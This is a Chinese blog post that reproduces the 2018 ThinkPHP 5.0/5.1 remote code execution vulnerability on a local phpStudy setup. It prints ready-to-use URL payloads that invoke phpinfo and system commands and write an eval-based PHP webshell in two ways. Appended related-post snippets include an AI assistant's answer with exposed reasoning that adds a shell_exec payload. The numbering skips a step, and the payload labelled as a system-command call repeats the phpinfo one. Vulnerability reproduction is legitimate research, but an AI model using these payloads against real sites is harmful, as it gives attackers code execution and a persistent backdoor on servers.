【漏洞复现】ThinkPHP5.x远程代码执行

最新推荐文章于 2024-08-07 18:27:39 发布
原创 最新推荐文章于 2024-08-07 18:27:39 发布 · 645 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#渗透测试 #安全漏洞 #web渗透 #漏洞复现

本文详细介绍了2018年12月ThinkPHP5框架的一个高危漏洞,该漏洞允许远程代码执行。影响版本包括5.0和5.1,特别是未开启强制路由的情况。漏洞复现步骤包括下载指定版本,搭建环境,利用system函数和phpinfo函数进行命令执行和信息查看,以及写入shell。提供的Payload展示了如何触发漏洞。

一、漏洞描述

2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.thinkphp.cn/869075

漏洞的原因是由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行,受影响的版本包括5.0和5.1。

二、漏洞影响版本

Thinkphp 5.x-Thinkphp 5.1.31

Thinkphp 5.0.x<=5.0.23

三、漏洞复现

1、官网下载Thinkphp 5.0.22,下载地址: http://www.thinkphp.cn/donate/download/id/1260.html

2、使用phpstudy搭建环境,解压下载的Thinkphp5.0.22到网站目录下,浏览器访问http://127.0.0.1/thinkphp/public
在这里插入图片描述

3、利用system函数远程命令执行

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

4、通过phpinfo函数查看phpinfo()的信息

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

在这里插入图片描述

5、写入shell

Payload如下:

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST[cmd]);?^> >shell.php

注意:需要对特殊字符使用^转义(cmd环境下转义方式),windows环境的echo命令输出字符串到文档不用引号(单引号、双引号),部分字符url编码不编码都行。

在这里插入图片描述

6、查看是否成功写入shell

在这里插入图片描述

8、第二种的写入shell的方法

Payload如下:

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=<?php @eval($_POST[test]);?>
Thinkphp V5.X 远程代码执行漏洞 - POC(精:集群5.0*、5.1*、5.2*)
墨痕诉清风的博客
11-07 4820
官方公告:1、2、POC:批量检测单个检测
thinkphp3.2.x 代码执行
qq_23003811的博客
07-15 774
2、访问日志生成地址:/index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/24_07_15.log,其中修改24_07_15为当天日期,解析phpinfo成功。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。1、构造payload:/index.php?
THINKPHP5.X远程命令执行漏洞
qq_40461312的博客
10-09 1724
前言 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 一、漏洞影响范围 5.x < 5.1.31, <= 5.0.23 二、如何确认THINKPHP版本 多数情况下直接引发报错页面即可获取到thinkphp版本信息,也可以.
ThinkPHP5远程代码执行exp利用工具safe6
safe6
12-12 7189
影响范围:ThinkPHP 5.0 - 5.1版本。 危害:远程代码执行 目前,ThinkPHP已发布新版本修复此漏洞,请广大ThinkPHP站长尽快升级: https://blog.thinkphp.cn/869075   2018.12.11 说明: 漏洞检测5.0和5.1都可以检测。 命令执行,文件上传只支持5.0版本tp。5.1和5.0利用大同小异,不打算写。这只是个练手...
ThiThinkPHP5.x 远程函数执行
有时候,想要一块二向箔
08-31 788
正文 实验地址:ThinkPHP5.x 远程函数执行与sql注入_安全龙-专注做企业网络安全服务与网络安全培训! (anquanlong.com) 知识梳理: PoC,全称“Proof of Concept”,中文“概念验证”,常指一段漏洞证明的代码。 Exp,全称“Exploit”,中文“利用”,指利用系统漏洞进行攻击的动作。 Payload,中文“有效载荷”,指成功 exploit 之后,真正在目标系统执行的代码或指令。 Shellcode,简单翻译“shell 代码”,是 Payload 的一种,由于
漏洞复现ThinkPHP5 5.x 远程命令执行(getshell)
weixin_34314962的博客
12-11 4191
0x00复现环境 ThinkPHP 5.x (v5.0.23及v5.1.31以下版本) 远程命令执行漏洞利用(GetShell) 0x01步骤 点击start to hack 进入环境页面 run the project 然后访问给出的target address执行系统命令显示目录下文件http://aaa.vsplate.me:52763/public/index.php?s=/index...
ThinkPHP5.0.x远程执行漏洞分析与复现
qq_74148743的博客
05-11 2530
2018年12月10日,ThinkPHPv5系列发布安全更新,修复了一处可导致远程代码执行的严重漏洞。此次漏洞ThinkPHP v5框架代码问题引起,其覆盖面广,且可直接远程执行任何代码和命令。电子商务行业、金融服务行业、互联网游戏行业等网站使用该ThinkPHP框架比较多,需要格外关注。由于ThinkPHP v5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接进行远程代码执行,进而获得服务器权限。
ThinkPHP5.0.x 远程代码执行
LYJ20010728的博客
08-16 1366
ThinkPHP5.0.x 远程代码执行漏洞概要初始配置漏洞利用漏洞分析漏洞修复攻击总结 漏洞概要 本次漏洞存在于 ThinkPHP 的缓存类中。该类会将缓存数据通过序列化的方式,直接存储在 .php 文件中,攻击者通过精心构造的 payload ,即可将 webshell 写入缓存文件。缓存文件的名字和目录均可预测出来,一旦缓存目录可访问或结合任意文件包含漏洞,即可触发 远程代码执行漏洞 漏洞影响版本: 5.0.0<=ThinkPHP5<=5.0.10 初始配置 获取测试环境代码
Thinkphp 5.x远程命令执行漏洞
白泽Sec安全实验室
11-07 1774
漏洞描述 ThinkPHP官方2018年12月9日发布重要的安全更新,修复了一个严重的远程代码执行漏洞。该更新主要涉及一个安全更新,由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞,推荐尽快更新到最新版本。 thinkphp5最出名的就是rce,rce有两个大版本的分别: ThinkPHP 5.0-5.0.24 ThinkPHP 5.1.0-5.1.30 因为漏洞触发点和版本的不同,导致payload分为多种,其中一些payload需要取决于debug选项比如直
ThinkPHP v5.x命令执行利用工具(可getshell)
11-19
ThinkPHP v5.x命令执行利用工具(可getshell)
Thinkphp框架 5.x远程命令执行漏洞复现
AzVoidSUN的博客
07-06 530
thinkphp 编辑 ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进。 [1] ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,诞生于2006年初,原名FCS,2007
ThinkPHP5.x-远程命令执行漏洞
LYJ20010728的博客
06-06 846
ThinkPHP 5.x远程命令执行漏洞漏洞原因漏洞影响版本漏洞复现搭建漏洞环境POC1POC2&POC3POC4&POC5 漏洞原因 由于框架对控制器名没有进行足够的检测,导致在没有开启强制路由(默认未开启)的情况下可能导致远程代码执行 漏洞影响版本 Thinkphp 5.x-Thinkphp 5.1.31 Thinkphp 5.0.x<=5.0.23 漏洞复现 搭建漏洞环境 官网下载Thinkphp 5.0.22,下载地址 使用phpstudy搭建环境,解压下载的Thin
ThinkPHP5--rce远程代码执行
m0_74402888的博客
04-30 1587
ThinkPHP5版本中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞
复现ThinkPHP5 5.0.23远程代码执行漏洞
NLXHBM的博客
04-15 513
搜索ThinkPHP5.0.23相关漏洞 2. 发现了 5.0.23Remote Code Execution(远程代码执行漏洞) 将该漏洞cp到tp.txt文件并查看 3.burpsuite进行抓包 4.执行命令 5. 写入phpinfo: `echo "<?php phpinfo(); ?>" > /var/www/public/phpinfo.php` 6.查看是否写入: 7.访问http://159.75.16.25:8...
Thinkphp5x远程执行命令及getshell
2201_75891821的博客
08-07 966
靶场:vulhub/thinkphp/5-rcedocker-compose up -d #启动环境。
Thinkphp5.0.23远程代码执行漏洞复现
02-01 2526
Thinkphp5.0.23远程代码执行漏洞介绍、成因和复现
ThinkPHP 5.0 get SHELL
q412539429的博客
02-19 1103
Thinkphp v5.0.x补丁地址: https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f 路由信息中controller的部分进行了过滤,可知问题出现在路由调度时 关键代码: 在修复之前程序未对控制器进行过滤,导致攻击者可以通过引入\符号来调用任意类方法。 1.利用sys...
ThinkPHP5 5.0.22/5.1.29 远程代码执行
最新发布
10-29
<think>嗯,用户要求我查找ThinkPHP5版本5.0.22和5.1.29的远程代码执行漏洞信息。参考了多个站内引用,这些引用都指向同一个漏洞。 用户提供了五个引用来源,我需要从中提炼关键信息。引用[1]提到漏洞是由于获取method方法未正确处理方法名,导致攻击者能调用Request类任意方法;引用[2][3]则强调问题出在控制器名处理不当,默认配置下未开启强制路由;引用[4]明确了受影响版本范围是5.0.23和5.1.31之前的所有版本;引用[5]则给出了具体的漏洞复现URL示例。 漏洞本质在于框架对控制器名的过滤缺陷。当未开启强制路由时(默认关闭),攻击者可通过特殊构造的URL调用任意方法。比如引用[5]展示的payload就很典型:通过s参数注入命名空间路径,配合invokefunction调用危险函数如shell_exec。 修复方案很明确:升级到安全版本5.0.23或5.1.31。临时措施可开启强制路由,但可能影响正常业务。有趣的是,引用[1][3]都提到这是"RCE漏洞",说明危害等级很高。 用户可能需要明确三点:漏洞原理、如何验证漏洞存在、怎样修复。在整理回答时,我会把利用方式中的payload示例单独用代码块呈现,因为涉及具体攻击语法需要清晰分隔。另外需要强调docker复现环境搭建步骤,这对安全研究人员很实用。 考虑到用户是技术背景,相关问题设计可以更深入:比如漏洞的CVE编号、实际攻击案例、补丁对比分析等。安全类问题需要特别注意准确性,所有技术细节必须严格对照引用来源表述。 </think>根据提供的引用信息,以下是ThinkPHP 5.0.22/5.1.29 远程代码执行漏洞的完整分析: --- ### 💣 **漏洞详情** 1. **漏洞本质** 框架未正确处理控制器名和方法名,导致在未开启强制路由(默认关闭)时,攻击者可构造恶意URL调用`Request`类的任意方法,最终实现远程代码执行(RCE)[^1][^2][^3]。 2. **影响版本** - `5.0.x ≤ 5.0.22` - `5.1.x ≤ 5.1.29` (安全版本:5.0.23+ / 5.1.31+)[^4] 3. **触发条件** 默认配置下未开启强制路由(`url_route_must=false`),允许通过URL动态调用控制器方法[^2][^3]。 --- ### ⚠️ **利用方式** 1. **基础攻击Payload** 通过`s`参数注入恶意控制器路径,调用`invokefunction`执行系统命令: ```bash http://target.com/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id ``` 此Payload调用`shell_exec('id')`返回当前用户信息[^5]。 2. **利用链关键点** - 路径穿越:`\think\app` 触发框架加载流程 - 动态调用:`invokefunction` 反射执行指定函数 - 参数控制:`vars[0]` 传递危险函数(如`system`/`exec`)[^5][^3] --- ### 🔧 **修复方案** 1. **官方补丁** 升级至安全版本: ```bash # 5.0.x 升级命令 composer update topthink/framework 5.0.23 # 5.1.x 升级命令 composer update topthink/framework 5.1.31 ``` 补丁修复了方法名过滤逻辑,禁止非法字符调用[^1][^4]。 2. **临时缓解措施** - 开启强制路由(修改`config/app.php`): ```php 'url_route_must' => true, // 强制路由生效 ``` - 配置WAF拦截包含`/think/app/invokefunction`的请求[^2][^3]。 --- ### 🔍 **漏洞复现步骤** 1. 使用Vulhub环境搭建: ```bash cd vulhub/thinkphp/5.rce docker-compose up -d # 启动漏洞环境 ``` 2. 访问Payload验证漏洞: ``` http://localhost:8080/index.php?s=/Index/\think\app/invokefunction&function=phpinfo&vars[]=1 ``` 成功则返回PHP配置信息[^4][^5]。 ---
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值